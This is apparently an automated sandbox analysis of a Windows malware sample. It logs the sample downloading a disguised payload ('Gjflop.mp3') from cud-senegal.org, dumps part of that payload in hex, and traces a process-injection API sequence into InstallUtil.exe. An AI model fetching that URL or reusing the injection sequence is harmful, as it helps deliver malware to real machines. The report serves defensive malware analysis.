                                Jan 14, 2025 15:03:45.523025036 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.523034096 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.523067951 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.523067951 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.523570061 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.523587942 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.523719072 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.523727894 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.523783922 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.524326086 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.524344921 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.524413109 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.524420977 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.524457932 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.524457932 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.525161028 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.525183916 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.525326967 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.525335073 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.525676012 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.595360041 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.595391989 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.595477104 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.595477104 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.595504045 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.595910072 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.613787889 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.613821983 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.613940954 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.613967896 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.614016056 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.614413023 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.614428997 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.614871979 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.614936113 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.614937067 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.614948034 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.615020037 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.615341902 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.615360022 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.615562916 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.615571976 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.615927935 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.615946054 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.616007090 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.616014004 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.616550922 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.616569996 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.616611958 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.616620064 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.616763115 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.617211103 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.617235899 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.617290020 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.617292881 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.617306948 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.617336035 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:45.617352009 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.617352009 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.617381096 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:45.659375906 CET49704443192.168.2.551.159.14.89

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 14, 2025 15:03:42.788301945 CET6539553192.168.2.51.1.1.1
                                Jan 14, 2025 15:03:42.942213058 CET53653951.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jan 14, 2025 15:03:42.788301945 CET192.168.2.51.1.1.10xc2f7Standard query (0)cud-senegal.orgA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jan 14, 2025 15:03:42.942213058 CET1.1.1.1192.168.2.50xc2f7No error (0)cud-senegal.org51.159.14.89A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • cud-senegal.org

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54970451.159.14.894434456C:\Users\user\Desktop\TiOWA908TP.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 14:03:44 UTC215OUTGET /post-postlogin/Gjflop.mp3 HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                Host: cud-senegal.org
                                Connection: Keep-Alive
                                2025-01-14 14:03:44 UTC209INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Tue, 14 Jan 2025 14:03:44 GMT
                                Content-Type: audio/mpeg
                                Content-Length: 1377288
                                Connection: close
                                Last-Modified: Tue, 14 Jan 2025 08:26:21 GMT
                                Accept-Ranges: bytes
                                2025-01-14 14:03:44 UTC16175INData Raw: 31 bf 4a da 98 53 f2 e8 04 cd 86 60 9d c8 72 27 f4 63 3a 01 a6 b2 da 58 6a 75 07 32 a6 dd 63 1e 69 19 d0 f5 8b 71 d4 2a 4f 3d 80 a0 36 6f 66 c9 93 9a b9 97 06 fb 1c b1 40 ca 44 5b 8d 6f 84 e9 0e 3b 5f ff 4e 6f f2 b6 e5 8c 85 6f ac 20 a4 10 46 67 ec 98 75 93 63 74 d2 c2 9c f4 33 cb 47 56 7f b2 8d 68 f2 3a 90 1c 7c 43 54 1e dc e8 bc 9d 00 5e 12 d9 62 05 a5 25 2a 44 2e 5f 63 1d 4a b7 9d e9 d9 c8 85 42 44 e7 47 51 00 60 cf c1 c8 7b 45 8e d7 54 3a 7a fb 8a 8e aa 1f 40 8f 92 8c fb 16 5e 76 fc 8e 59 4f 7e 16 a6 e9 48 49 b5 3e 93 f1 99 73 9d 72 64 2b d1 01 c8 13 59 b2 cd f1 d3 72 82 bf 96 0e 1d 5b bf 82 28 9d 94 f7 c9 e8 68 3d 6c d5 72 2c be ff a2 76 8f 9b bd f4 a3 2a 35 28 41 e2 25 23 da fa 08 81 2b f9 80 23 57 93 ea 84 b5 67 f3 08 fd 5f 2d 5a 31 2c 20 65 42 79
                                Data Ascii: 1JS`r'c:Xju2ciq*O=6of@D[o;_Noo Fguct3GVh:|CT^b%*D._cJBDGQ`{ET:z@^vYO~HI>srd+Yr[(h=lr,v*5(A%#+#Wg_-Z1, eBy
                                2025-01-14 14:03:44 UTC16384INData Raw: db df 0c 34 06 28 25 9f ab 1a e2 d5 e1 cb 26 fd 28 ca 5e b8 3a 0c 35 df bc 1c 70 45 20 6a 30 c1 87 92 d9 d6 e6 4a ce 06 3f b6 50 15 1d f9 f8 d6 55 a4 55 5c df 65 ba 3a 06 1a 30 0c 9a ff 9a 6a 84 15 c1 a8 af 37 ae 18 f3 27 78 5a d6 a7 2c 7e 35 de c3 0a c0 db 2a 2c 1a 01 64 03 e0 1f de 84 8c 20 08 05 f1 01 cb 20 92 f4 02 ca 92 a0 fc 6c c0 a4 b5 1d 53 b9 d1 bd d2 20 2b ca 07 81 af 6c 89 f1 47 9a 85 0a 29 00 61 25 a8 f7 e8 84 28 a3 fb 63 24 51 ad 3a a5 2a 8e d9 64 e8 1e aa 8e 47 71 8c 55 5d c1 33 dd 8e 53 72 a5 47 b4 61 f6 74 87 45 ee 67 1b 6d 0c 2a 30 cc bc 33 a5 58 f3 50 37 b4 46 6f 76 7b bf a4 51 4e 96 2f 41 38 89 0e 16 d8 39 0b d0 9b 94 26 96 55 8a 4c 15 0c bb 9f ec 81 72 55 5f 8b 36 62 09 dc a6 f2 f8 19 a0 68 a2 26 ef c4 5c f4 4c ab ca bf 2b 06 e4 fc 6b
                                Data Ascii: 4(%&(^:5pE j0J?PUU\e:0j7'xZ,~5*,d lS +lG)a%(c$Q:*dGqU]3SrGatEgm*03XP7Fov{QN/A89&ULrU_6bh&\L+k
                                2025-01-14 14:03:44 UTC16384INData Raw: 93 95 93 80 b2 52 6f 6e 47 25 dc 88 87 e9 2f 85 42 44 58 f7 d2 ae c9 1d 2e bd 0b 38 82 80 d8 e1 62 70 b5 e2 a5 87 00 54 9c 8b 38 11 6b 95 a8 d9 7d 99 fd 4c 39 e1 9f b0 34 09 8f 82 13 c3 ef 48 f2 0a 2e a1 51 1d 6d bd 4c 5f ee bc f0 35 f0 9e 0b ba 79 a4 21 99 6c 50 25 35 a6 fc 10 41 f5 6d 7b f0 98 d9 01 b1 8b 32 86 ce 2d ad 50 e1 2f fa d5 df eb e6 de 35 4e ed 6a e6 8b cc 5f 6f 01 d9 8b cd 59 04 67 a6 ec 22 ea 72 68 13 09 7b 23 73 79 3e f2 da 48 b8 39 8a 0f 95 f6 5e 0d 09 00 06 a8 2a c7 2e 68 8c ba 59 36 98 ba 8d c7 4b 96 f6 01 45 bb a7 24 8a 32 c5 d8 c4 67 3b cc ba f6 a3 9e b3 e8 88 c8 db 97 47 9c f5 d4 ca 44 c7 fc 63 ec d3 2b 81 ac 81 3c 2b fe ca 06 5e f4 37 27 7a c4 21 b1 a0 ef 74 cf 36 ab 8b a3 e6 f9 54 b8 b3 28 12 26 33 c9 60 9b 25 f2 3c 0c 81 47 8a 7f
                                Data Ascii: RonG%/BDX.8bpT8k}L94H.QmL_5y!lP%5Am{2-P/5Nj_oYg"rh{#sy>H9^*.hY6KE$2g;GDc+<+^7'z!t6T(&3`%<G
                                2025-01-14 14:03:44 UTC16384INData Raw: ae 2d fa 93 4f 0e 09 4f 23 4b 8c cf df 17 1e 21 6a da d8 8e 2c 91 86 14 b8 f9 bc 05 8f 2c 15 b2 51 f0 1c 43 ac 9c 9e 55 e6 ea f4 15 b3 3c 4e 7a f0 ff c2 52 56 20 f8 d6 27 6d 2d b5 06 4c 42 e5 cd 1a e1 bd 78 0a a0 d3 df df 3e 68 df c0 b9 96 da 39 43 24 73 ea f5 7f b1 9b 49 70 5b 64 a3 ae 76 b8 e7 04 7d 81 68 4f ad 05 4f 86 bb c5 bb a8 05 24 cc fc 5b c4 eb 3f 10 4a 3b 9c 06 37 b9 c6 c6 12 37 aa b7 37 81 50 a1 e3 1d 96 74 9d 08 3d 3e 95 59 74 cc 0f b2 0a 93 71 c6 96 c5 9a e7 c1 84 42 de 38 08 63 77 81 e5 b6 51 ff aa e3 3b f6 45 b4 8c 47 ba 6f 1a 65 da 77 1d f8 ca 18 34 f3 c7 f2 68 87 57 ce 1b ad b3 97 83 24 b9 93 9e cd 80 e2 17 64 45 c3 29 9a f2 06 e0 b7 d3 95 6d 68 db 36 46 2e b4 0a ba 3f 44 5c 82 52 d9 25 f8 13 de 07 80 78 ea 1c 89 3b 88 19 77 60 b2 f6 ab
                                Data Ascii: -OO#K!j,,QCU<NzRV 'm-LBx>h9C$sIp[dv}hOO$[?J;777Pt=>YtqB8cwQ;EGoew4hW$dE)mh6F.?D\R%x;w`
                                2025-01-14 14:03:44 UTC16384INData Raw: f8 a9 a7 aa ac 2f 11 6c 13 53 fd 10 dc 4f ed a7 1c b4 95 e3 38 64 51 e2 42 cf 46 d4 60 9f ba 63 49 d0 b4 5e 0d 7b 22 bc fc 9e ab 74 cd fb cb 5e cf 49 49 8c fe 67 51 88 63 99 d2 1f 9e 28 60 1f bd f8 b5 af c9 cd 03 60 29 f6 bf 54 9f c9 a6 38 5a 38 c3 21 b4 ed b0 5f 5a 7f 78 e3 d2 75 fd 5b 8f 87 51 1c f2 32 52 7e 4b f1 92 57 0c 7e 1b 8b c1 bc 60 c4 80 59 0a 56 2a b3 41 2f 61 42 11 b3 2f d1 df 2f f4 eb a9 a7 92 0d ec a8 ee eb 85 6b 95 14 df 69 43 38 ff 27 92 da 9d b8 0f f0 7c 5d 14 9d 45 f0 62 ff 6f ef 29 79 78 2e 4b 06 b8 da 5b 71 7b 41 12 c5 cd bb 83 8d 5c a3 2b 2f b5 07 85 80 cb b9 45 fb d7 fc 72 5f 38 75 d1 38 cb e8 a7 96 6f 12 b3 d8 8c b2 f8 43 3e c3 8a 0e 3f be 92 77 f6 af 70 88 57 42 5d 10 99 e8 44 6a a2 69 e1 9b 03 c7 53 e0 65 ed ac f5 b0 dc d7 ca bc
                                Data Ascii: /lSO8dQBF`cI^{"t^IIgQc(``)T8Z8!_Zxu[Q2R~KW~`YV*A/aB//kiC8'|]Ebo)yx.K[q{A\+/Er_8u8oC>?wpWB]DjiSe
                                2025-01-14 14:03:44 UTC16384INData Raw: 64 6d 76 de e5 c1 62 38 2b c7 91 5c 82 2d 30 07 f5 26 98 16 f8 36 b1 ba 4a de dd b5 98 31 50 57 1d 64 8b 91 e7 02 a1 53 c0 39 72 24 75 6b ca 8a c1 87 42 40 e2 3c 83 10 2b 38 07 15 06 0b 37 5c e6 58 3f 05 95 a6 26 47 4c ab c9 e8 8e a6 10 a8 90 3d 38 83 7e e4 8b 5b a0 f4 22 61 a6 0c 21 2d d9 5b ec e0 24 d1 d1 29 9d 97 fb 35 a5 27 5a 85 35 a4 2c 44 ee 4b fb c7 f9 24 c0 57 42 9f e4 74 52 a2 53 e7 cd 6d 95 c4 73 f6 d6 ed 49 10 ce ce 21 f9 ca f9 fb fb b0 ba 9e 1d cc 03 ae d7 6a fe 05 51 12 23 0f 0a cd 47 53 ea 38 c8 c3 d1 fd a3 ef 7f b6 c5 37 4e 43 86 db 34 28 5e 5c 18 3f c0 fa 53 dc fd bd ae 09 33 bd 85 e4 af f9 8d 93 45 2a fa 59 17 2c c3 9b 11 07 a7 a2 ca 4c e7 13 e7 55 61 c4 0d 46 58 4a cb 89 14 07 c2 90 84 4d 15 7f 30 db 2f ab fa 4b 94 1c ba 4f 47 9b 02 09
                                Data Ascii: dmvb8+\-0&6J1PWdS9r$ukB@<+87\X?&GL=8~["a!-[$)5'Z5,DK$WBtRSmsI!jQ#GS87NC4(^\?S3E*Y,LUaFXJM0/KOG
                                2025-01-14 14:03:44 UTC16384INData Raw: ae b8 b8 69 b1 68 e1 e4 68 b9 f3 e3 be 99 8e 21 f1 c9 d5 be 67 68 a9 bb 70 cc 6e 34 7a a7 cb fa 73 ed 5e b2 ea 45 2b f6 3d 89 7e 34 47 79 5d ff 6c 58 64 54 76 e6 f3 b4 0a 6d 9f 07 08 b1 ba c3 12 eb aa 8d 14 1e 09 8f 7f 49 46 32 89 16 7f 6f 7c 07 b6 de 17 06 95 df b7 bb 7b 1a 01 92 d9 0b 49 69 6c 74 78 e2 09 53 01 a3 49 38 fa 7c 17 00 99 4c 6e f3 33 aa 23 6c b3 90 f9 ec b2 3d 24 96 1b e9 c4 60 d5 48 e3 12 34 49 e2 cd a8 96 4b 89 b1 19 89 a1 10 82 e4 0e 1b b8 a5 67 96 41 78 b3 88 45 0f 4c 2f 2a 03 2c 47 d7 cf d6 ee ee 4d ad 4b ef d2 0d 0e 00 72 64 6b 8f 9c f5 ec a7 6b ec af 63 98 47 51 40 f6 78 f9 80 85 33 64 d2 64 ed 97 18 e9 84 a1 f6 41 cb 08 f8 16 e5 c8 f1 bb 02 a7 0d 13 1e b9 aa 3c 64 14 64 b8 21 71 30 7e e7 42 12 e8 4d 0a e6 18 ca d3 5b 0a ed bc 71 68
                                Data Ascii: ihh!ghpn4zs^E+=~4Gy]lXdTvmIF2o|{IiltxSI8|Ln3#l=$`H4IKgAxEL/*,GMKrdkkcGQ@x3ddA<dd!q0~BM[qh
                                2025-01-14 14:03:44 UTC16384INData Raw: fa 5e 35 23 9f 1e 97 fe c5 ce 33 73 67 3b 0f 45 7a 08 21 72 fc 8b 45 7a 42 1b c2 a0 fb f6 8d 83 4c 1c 44 8a f9 20 22 4d 88 bf 77 bc a7 2c ac 85 f5 2a a0 9c d4 7a e9 58 f2 32 59 03 ce 3e 20 f1 87 58 f5 6d 6e 76 ae bb 38 9b 4d 03 b9 48 aa 7f c9 e7 f6 ed b2 fa 56 c6 b2 e1 fb 82 9e 79 bb 8e f3 0e 5f c2 9f 15 3a e5 63 1e d1 fc 94 e9 43 ee ee f8 2a f1 36 4d a2 21 51 b3 04 71 bd 96 b1 75 08 e2 58 1e db e5 27 db ee 54 1c dd 8d 5e f4 70 39 7e 83 04 f6 b1 2e 82 a9 62 54 6b 73 c1 f1 6b 52 97 f7 d3 21 53 d7 89 3a 33 4e e8 e4 d6 8d 3e e1 0d 86 f2 b1 6b 6e f2 27 b1 5e 47 c5 c0 8c dd 3f f6 a9 a8 7e 75 05 36 c5 eb aa fd 2b 30 31 31 89 b0 61 48 9d 7b 70 2e 27 6f e5 9a 74 8d 21 7f 06 78 50 75 f5 a2 09 d3 56 f9 fc ad 1e c5 11 74 6f 2a af 8f 80 75 9e 2d fd c3 00 f1 88 33 04
                                Data Ascii: ^5#3sg;Ez!rEzBLD "Mw,*zX2Y> Xmnv8MHVy_:cC*6M!QquX'T^p9~.bTkskR!S:3N>kn'^G?~u6+011aH{p.'ot!xPuVto*u-3
                                2025-01-14 14:03:44 UTC16384INData Raw: 8b bd 1f 69 53 d0 43 8c c1 fd 25 b7 14 fa 5b 13 94 d0 f9 be 71 1f 4a 24 cc 0c c3 a9 fb b3 14 1b a6 9f 15 ac 04 5b e0 58 d4 8a 8f 6b fc 9b 14 19 23 47 63 c2 a0 58 b1 6c 77 14 36 4e 15 55 38 e0 95 d5 95 88 c9 48 6d 0c 5d 3f 5a 9d 06 05 d7 ec 68 c9 84 f4 1b 41 8e a3 8c 7f 3a c0 2a 3a 9f 91 cb 4e f0 03 39 ff bb 12 b5 e1 7a 8a 77 88 7b cc 07 97 97 2c 6b a2 d8 36 c8 7a f5 74 ee 87 eb b0 2b 5d e2 7a 4f bb d7 a4 87 27 7a c0 d6 ad 30 e9 18 98 63 b9 ab 62 79 5a ca 57 b2 e2 73 a4 1e 18 af 8e 99 66 4c d4 60 d8 de 71 18 4d 3c b9 92 c3 a2 7d 0d d5 ad 34 69 69 38 96 0c 70 fd a7 e0 b7 44 fa 36 e3 9d 59 0d 24 ac 24 03 52 4b 14 a4 90 a7 0e 60 4f 9d 38 f5 d2 8c 6f c1 60 89 d6 00 b8 3e ec 3a ee c4 c4 6f 72 a9 f5 99 30 ca 29 2d f2 10 78 fd 6c 93 91 3a c5 cf 62 21 63 72 0b 1c
                                Data Ascii: iSC%[qJ$[Xk#GcXlw6NU8Hm]?ZhA:*:N9zw{,k6zt+]zO'z0cbyZWsfL`qM<}4ii8pD6Y$$RK`O8o`>:or0)-xl:b!cr
                                2025-01-14 14:03:44 UTC16384INData Raw: 8f a6 33 db 73 b1 78 b2 79 87 f1 55 09 05 6c be 44 76 0c 2e 5e 0e b6 1a d4 d0 4d 43 0b eb c4 bc 6b ad c6 a9 6c aa 18 df a4 70 41 82 3b 92 0b 5f d2 21 fc 09 74 e8 ce 8b 51 40 b9 a2 1d e1 cf 99 bd 3d 7b ef 8b 57 20 d4 a5 f7 2f 1a b4 d3 33 03 5c 49 6e 39 61 2e de 5e 60 37 97 3b 55 76 1e 64 50 b0 ba cb df 6f df 28 5f b9 af 99 62 19 44 74 c5 d6 a4 55 f5 a4 a9 be 19 1f eb 41 de a0 52 dd d8 2b 2a dd da 8c 48 70 6c bc 24 d3 34 37 73 36 53 e0 ee fb cb 56 b9 b9 78 8a c1 5b c6 3b 37 c2 1d 04 24 2b f8 7e f7 39 f1 d9 f6 9a a2 0b d7 77 0d 72 0a ac 2f 04 93 2a 25 a0 f6 e1 10 b3 cb d8 4c 87 27 95 0c 84 d5 7f f6 d5 39 f3 61 4e 84 c2 d6 4e de 0c e8 de 75 15 0b 8a f4 33 9f f5 c6 14 f2 f0 d2 4d 20 ab ee 05 06 25 48 b6 d9 39 6f 15 3c b4 d4 31 1a f1 c2 4a 33 9a 16 03 cf c5 e8
                                Data Ascii: 3sxyUlDv.^MCklpA;_!tQ@={W /3\In9a.^`7;UvdPo(_bDtUAR+*Hpl$47s6SVx[;7$+~9wr/*%L'9aNNu3M %H9o<1J3


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:09:03:40
                                Start date:14/01/2025
                                Path:C:\Users\user\Desktop\TiOWA908TP.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\TiOWA908TP.exe"
                                Imagebase:0xdc0000
                                File size:104'857'600 bytes
                                MD5 hash:F1BBCBCF580673F86692045F0E6C1141
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2482629176.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:09:04:06
                                Start date:14/01/2025
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                Imagebase:0x2e0000
                                File size:42'064 bytes
                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:6
                                Start time:09:04:07
                                Start date:14/01/2025
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 1148
                                Imagebase:0xb20000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:9.8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:4%
                                  Total number of Nodes:227
                                  Total number of Limit Nodes:13
                                  execution_graph 66724 14021c0 66725 14021dc 66724->66725 66726 14021ec 66725->66726 66731 1405980 66725->66731 66736 140935f 66725->66736 66741 14093d7 66725->66741 66747 1407a6b 66725->66747 66732 140599f 66731->66732 66751 6cd0530 66732->66751 66756 6cd0520 66732->66756 66733 14059c3 66733->66726 66737 140936b 66736->66737 66739 6cd0520 2 API calls 66737->66739 66740 6cd0530 2 API calls 66737->66740 66738 140937a 66739->66738 66740->66738 66742 14093e0 66741->66742 66743 140936b 66741->66743 66745 6cd0520 2 API calls 66743->66745 66746 6cd0530 2 API calls 66743->66746 66744 140937a 66745->66744 66746->66744 66769 6cd1807 66747->66769 66773 6cd1810 66747->66773 66748 1407a8c 66752 6cd0557 66751->66752 66761 6cd0980 66752->66761 66765 6cd097b 66752->66765 66753 6cd0614 66753->66733 66758 6cd0534 66756->66758 66757 6cd0614 66757->66733 66759 6cd097b VirtualProtect 66758->66759 66760 6cd0980 VirtualProtect 66758->66760 66759->66757 66760->66757 66762 6cd09c8 VirtualProtect 66761->66762 66764 6cd0a03 66762->66764 66764->66753 66766 6cd09c8 VirtualProtect 66765->66766 66768 6cd0a03 66766->66768 66768->66753 66770 6cd1810 66769->66770 66777 6cd1858 66770->66777 66774 6cd1825 66773->66774 66776 6cd1858 2 API calls 66774->66776 66775 6cd183d 66775->66748 66776->66775 66779 6cd1864 66777->66779 66778 6cd183d 66778->66748 66782 6cd1963 66779->66782 66786 6cd1968 66779->66786 66783 6cd19a8 VirtualAlloc 66782->66783 66785 6cd19e2 66783->66785 66785->66778 66787 6cd19a8 VirtualAlloc 66786->66787 66789 6cd19e2 66787->66789 66789->66778 66884 70b8859 66885 70b8863 66884->66885 66889 708a648 66885->66889 66894 708a658 66885->66894 66886 70b88a1 66890 708a658 66889->66890 66891 708a683 66890->66891 66899 708ac52 66890->66899 66905 708a87c 66890->66905 66891->66886 66895 708a66d 66894->66895 66896 708a683 66895->66896 66897 708a87c 8 API calls 66895->66897 66898 708ac52 8 API calls 66895->66898 66896->66886 66897->66896 66898->66896 66900 708a6ef 66899->66900 66901 708a87d 66899->66901 66901->66900 66910 708c090 66901->66910 66914 708c0a0 66901->66914 66902 708a9e1 66902->66891 66906 708a882 66905->66906 66908 708c090 8 API calls 66906->66908 66909 708c0a0 8 API calls 66906->66909 66907 708a9e1 66907->66891 66908->66907 66909->66907 66911 708c095 66910->66911 66918 708c3c4 66911->66918 66915 708c0b5 66914->66915 66917 708c3c4 8 API calls 66915->66917 66916 708c0d7 66916->66902 66917->66916 66919 708c3ca 66918->66919 66924 708c989 66919->66924 66935 708c9d0 66919->66935 66945 708c9e0 66919->66945 66920 708c0d7 66920->66902 66925 708c9d5 66924->66925 66926 708c992 66924->66926 66927 708ca17 66925->66927 66955 708d69b 66925->66955 66959 708d146 66925->66959 66964 708d4ce 66925->66964 66969 708d761 66925->66969 66973 708d38b 66925->66973 66978 708cfcc 66925->66978 66983 708d86a 66925->66983 66926->66920 66927->66920 66936 708c9d5 66935->66936 66937 708d86a 2 API calls 66936->66937 66938 708d69b 2 API calls 66936->66938 66939 708d38b 2 API calls 66936->66939 66940 708cfcc 2 API calls 66936->66940 66941 708ca17 66936->66941 66942 708d4ce 2 API calls 66936->66942 66943 708d761 2 API calls 66936->66943 66944 708d146 2 API calls 66936->66944 66937->66941 66938->66941 66939->66941 66940->66941 66941->66920 66942->66941 66943->66941 66944->66941 66946 708c9f5 66945->66946 66947 708d86a 2 API calls 66946->66947 66948 708d69b 2 API calls 66946->66948 66949 708d38b 2 API calls 66946->66949 66950 708cfcc 2 API calls 66946->66950 66951 708d4ce 2 API calls 66946->66951 66952 708d761 2 API calls 66946->66952 66953 708d146 2 API calls 66946->66953 66954 708ca17 66946->66954 66947->66954 66948->66954 66949->66954 66950->66954 66951->66954 66952->66954 66953->66954 66954->66920 66956 708d6a5 66955->66956 66988 59d79a8 66956->66988 66992 59d7734 66956->66992 66960 708d155 66959->66960 66996 59d7000 66960->66996 67000 59d7008 66960->67000 66961 708d184 66965 708d4dd 66964->66965 67004 59d7c18 66965->67004 67008 59d7c10 66965->67008 66966 708d460 66966->66927 66970 708d6c1 66969->66970 66970->66969 66971 59d79a8 VirtualAllocEx 66970->66971 66972 59d7734 VirtualAllocEx 66970->66972 66971->66970 66972->66970 66974 708d390 66973->66974 66975 708cea9 66974->66975 67012 59d8230 66974->67012 67016 59d8238 66974->67016 66975->66927 66979 708cfd6 66978->66979 66981 59d7008 Wow64SetThreadContext 66979->66981 66982 59d7000 Wow64SetThreadContext 66979->66982 66980 708d8b2 66981->66980 66982->66980 66984 708d872 66983->66984 66986 59d7008 Wow64SetThreadContext 66984->66986 66987 59d7000 Wow64SetThreadContext 66984->66987 66985 708d8b2 66986->66985 66987->66985 66989 59d79e8 VirtualAllocEx 66988->66989 66991 59d7a25 66989->66991 66991->66956 66993 59d79a8 VirtualAllocEx 66992->66993 66995 59d7a25 66993->66995 66995->66956 66997 59d704d Wow64SetThreadContext 66996->66997 66999 59d7095 66997->66999 66999->66961 67001 59d704d Wow64SetThreadContext 67000->67001 67003 59d7095 67001->67003 67003->66961 67005 59d7c60 WriteProcessMemory 67004->67005 67007 59d7cb7 67005->67007 67007->66966 67009 59d7c18 WriteProcessMemory 67008->67009 67011 59d7cb7 67009->67011 67011->66966 67013 59d8238 NtResumeThread 67012->67013 67015 59d82b5 67013->67015 67015->66975 67017 59d8280 NtResumeThread 67016->67017 67019 59d82b5 67017->67019 67019->66975 66790 13bd030 66791 13bd048 66790->66791 66792 13bd0a3 66791->66792 66795 6cd0f88 66791->66795 66800 6cd0f83 66791->66800 66796 6cd0fb0 66795->66796 66805 6cd1413 66796->66805 66810 6cd1418 66796->66810 66797 6cd0fd7 66797->66797 